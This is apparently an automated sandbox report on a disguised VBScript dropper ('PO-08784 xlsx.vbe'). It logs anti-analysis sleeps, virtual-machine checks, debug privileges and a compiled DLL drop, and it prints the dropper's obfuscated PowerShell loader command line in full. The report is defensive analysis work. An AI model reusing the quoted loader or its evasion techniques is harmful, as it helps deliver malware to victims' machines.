Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 8859

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3344

Thread sleep time: -10145709240540247s >= -30000s

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.dll

Jump to dropped file

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: wscript.exe, 00000000.00000003.252733876.000001332B549000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $e6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU = Tox
Source: powershell.exe, 00000003.00000002.542110723.00000000057BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: wscript.exe, 00000000.00000003.266492104.000001332BB4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dHe6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU
Source: wscript.exe, 00000000.00000003.266492104.000001332BB4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.266939098.000001332B839000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.267864017.00000133295FE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.268235777.000001332B731000.00000004.00000020.00020000.00000000.sdmp, PO-08784 xlsx.vbe	Binary or memory string: To3 = To3 & "e6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU"
Source: powershell.exe, 00000003.00000002.542110723.00000000057BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.534323736.0000000005304000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: wscript.exe, 00000000.00000003.266250386.000001332B9AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$thyridia = """ovafadandda-ditsiyfipoteco ro-fltmuyzoppreabdinevefpridenabisetfoilroelnmy fe'boujassuiinnsogud hosmiyfesdetnoeidmsa;vaumosphistnbegau vispuynesbrttuevrmta.harreubensctmaievmsterk.iniinnwhthoeoerafoshpsosejedercavchilicpiebrsdi;trpraudibfollaialcvo bospatalasktgoigacgu licdelswastsunsre prmopesptskhdeymilno1en di{ci[dedanloplgliirmcopopocurbutaf(ef`"""unktoelorsensrepelli3ko2ha`"""fr)ji]vopatudrbunlreimicno kosdrtscatitkriircpo chesaxuntslelyrtyngr sriejnbethu peglietetdetkahfirhveunabrdtrtinispmjeeitsco(riiugnjutcr bepinrskostgunrfi8op2we,raiswnsytan meffirskepsmsuakhdov,priafnhytre drtlieunlcoeno,reitvnmitfo witabrfuesydcyiaf,raisbncotur optmyistmtr)sp;ti[bodkrlfilmeiromunpkeoafrcitsu(ha`"""geuunsseenarwi3su2sc`"""us)ci]nypceutobpeladiefcud sqscotgaaretnaidrcro smebyxdotjaegtrtrnpe blichnadtja pocinlacityepanbrtulttrofosrectirvaemdelenbr(neistngltov siiudnwrkliosprbapre,coicencotme zetcoefrkplnfaore)al;un[mudunlcalheinumfrptyopirbrtki(fo`"""wakwoetwrfanfreunlpr3ru2su`"""st)fr]udpdeualbcaltricrcre cosrutgraaltveitacti vaeslxustboenergenpa diisunoktca ineovxhapsaauhnpldunebrnsavpaistrprotrndrmstehynfetflswotunrsvidanabgwesfi(eriblnretst rerecocytsotdeepo,teichnretsu fobufugalma,biimonbitde inebrnoetafoco)re;ra[pldlalavlfuiafmskpbeoanrsutko(te`"""beuelsjieelrst3mu2fy`"""di)to]popvauanbbrlmaipucos ovsretpeaprtpeiufcso toefoxovtmaenortensl prifrnqutbl ameegnpuubamaucpihpoidilnedbewisiefnfldfrokiwbesso(miihontatfu holmiiovtrahfoeindro,anigencatal hydreifoosubmoosl,meiolntutch poataluvuvanungal)va;tr[emdselkrlgoijamprpcoocrrretst(yo`"""mawbeivinlamcombi.nldselfllhe`"""de)no]ilpopuchbtelomibucfo frsretcoachtudijucsa unepnxretmaekvrlgnel veimenintbr injauoopyhusacesetdicdiagepsutbeuavrouece(idiwenfotex afkpeoandunipofno,seispnretbe unvfaelijbe,friesnwitop abedimchpuntmoisp,ceiunnlatfl birureudaviccytduine)po;no[nodtnlhylouiopmakpdeoberaptir(un`"""opkhmenirdrnamemolgr3sf2el`"""kr)li]scpviugrbbrlriiitcpr resfrtgsairtapipacpo uneuhxkrtsyemarranir skvafobyiopdde imgjulreofabdianalspmmaelimmyovarbryhjsettsuatutanufrsub(snifrnretra suawrnjelepgsksemiud)ou;cy[fiddrlsplclibamanpatocorbotno(si`"""ovkanemirunngaecolpr3co2na`"""gr)pr]moptouhabdrlphiskcna sksmatstasetdiiaicva haelyxfotuneenrbrnco saijunpstak unisnsobvpuacolspipldagcmootodstesupsuamagsuesa(ejiafnhytbi caggaakauudmca)fr;fa[codphlhylunidimtypovorurmitfo(mi`"""unkseelirbenriejulch3sl2an`"""sa)si]ampwhuelbsellaisuckl mtsrbtloasptreifocaj mieunxevtsneforbuncu amiteneftte suhoreovadapbirpleseabildelsoorycac(doikonsltfo sthfrablnbedbi,esihennotrk apfunasplsesol,biidansutsu cohdruconlegba,afitrnnetno routrnrbdseessrne)fo;ko[fldpilpelstidamtephyosyrsytje(ub`"""brgundreigl3ud2un`"""ep)pr]mipunuunbfoladiafcba fesshtdiaditbeidecve sieyaxsktkeeprrrenin coimynnetbl unccormeeevaimtskethspaoheluhiexdalblerdiucascahpa(beibonvatuh cafsyohirba)mi;pe[cuddilouldeiaimlapkrogrrovtdi(ar`"""t
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$thyridia = """ovafadandda-ditsiyfipoteco ro-fltmuyzoppreabdinevefpridenabisetfoilroelnmy fe'boujassuiinnsogud hosmiyfesdetnoeidmsa;vaumosphistnbegau vispuynesbrttuevrmta.harreubensctmaievmsterk.iniinnwhthoeoerafoshpsosejedercavchilicpiebrsdi;trpraudibfollaialcvo bospatalasktgoigacgu licdelswastsunsre prmopesptskhdeymilno1en di{ci[dedanloplgliirmcopopocurbutaf(ef`"""unktoelorsensrepelli3ko2ha`"""fr)ji]vopatudrbunlreimicno kosdrtscatitkriircpo chesaxuntslelyrtyngr sriejnbethu peglietetdetkahfirhveunabrdtrtinispmjeeitsco(riiugnjutcr bepinrskostgunrfi8op2we,raiswnsytan meffirskepsmsuakhdov,priafnhytre drtlieunlcoeno,reitvnmitfo witabrfuesydcyiaf,raisbncotur optmyistmtr)sp;ti[bodkrlfilmeiromunpkeoafrcitsu(ha`"""geuunsseenarwi3su2sc`"""us)ci]nypceutobpeladiefcud sqscotgaaretnaidrcro smebyxdotjaegtrtrnpe blichnadtja pocinlacityepanbrtulttrofosrectirvaemdelenbr(neistngltov siiudnwrkliosprbapre,coicencotme zetcoefrkplnfaore)al;un[mudunlcalheinumfrptyopirbrtki(fo`"""wakwoetwrfanfreunlpr3ru2su`"""st)fr]udpdeualbcaltricrcre cosrutgraaltveitacti vaeslxustboenergenpa diisunoktca ineovxhapsaauhnpldunebrnsavpaistrprotrndrmstehynfetflswotunrsvidanabgwesfi(eriblnretst rerecocytsotdeepo,teichnretsu fobufugalma,biimonbitde inebrnoetafoco)re;ra[pldlalavlfuiafmskpbeoanrsutko(te`"""beuelsjieelrst3mu2fy`"""di)to]popvauanbbrlmaipucos ovsretpeaprtpeiufcso toefoxovtmaenortensl prifrnqutbl ameegnpuubamaucpihpoidilnedbewisiefnfldfrokiwbesso(miihontatfu holmiiovtrahfoeindro,anigencatal hydreifoosubmoosl,meiolntutch poataluvuvanungal)va;tr[emdselkrlgoijamprpcoocrrretst(yo`"""mawbeivinlamcombi.nldselfllhe`"""de)no]ilpopuchbtelomibucfo frsretcoachtudijucsa unepnxretmaekvrlgnel veimenintbr injauoopyhusacesetdicdiagepsutbeuavrouece(idiwenfotex afkpeoandunipofno,seispnretbe unvfaelijbe,friesnwitop abedimchpuntmoisp,ceiunnlatfl birureudaviccytduine)po;no[nodtnlhylouiopmakpdeoberaptir(un`"""opkhmenirdrnamemolgr3sf2el`"""kr)li]scpviugrbbrlriiitcpr resfrtgsairtapipacpo uneuhxkrtsyemarranir skvafobyiopdde imgjulreofabdianalspmmaelimmyovarbryhjsettsuatutanufrsub(snifrnretra suawrnjelepgsksemiud)ou;cy[fiddrlsplclibamanpatocorbotno(si`"""ovkanemirunngaecolpr3co2na`"""gr)pr]moptouhabdrlphiskcna sksmatstasetdiiaicva haelyxfotuneenrbrnco saijunpstak unisnsobvpuacolspipldagcmootodstesupsuamagsuesa(ejiafnhytbi caggaakauudmca)fr;fa[codphlhylunidimtypovorurmitfo(mi`"""unkseelirbenriejulch3sl2an`"""sa)si]ampwhuelbsellaisuckl mtsrbtloasptreifocaj mieunxevtsneforbuncu amiteneftte suhoreovadapbirpleseabildelsoorycac(doikonsltfo sthfrablnbedbi,esihennotrk apfunasplsesol,biidansutsu cohdruconlegba,afitrnnetno routrnrbdseessrne)fo;ko[fldpilpelstidamtephyosyrsytje(ub`"""brgundreigl3ud2un`"""ep)pr]mipunuunbfoladiafcba fesshtdiaditbeidecve sieyaxsktkeeprrrenin coimynnetbl unccormeeevaimtskethspaoheluhiexdalblerdiucascahpa(beibonvatuh cafsyohirba)mi;pe[cuddilouldeiaimlapkrogrrovtdi(ar`"""t			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES47C6.tmp" "c:\Users\user\AppData\Local\Temp\bqup1euq\CSCA347F263B587453BB38F4BBC1F3B31.TMP"	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
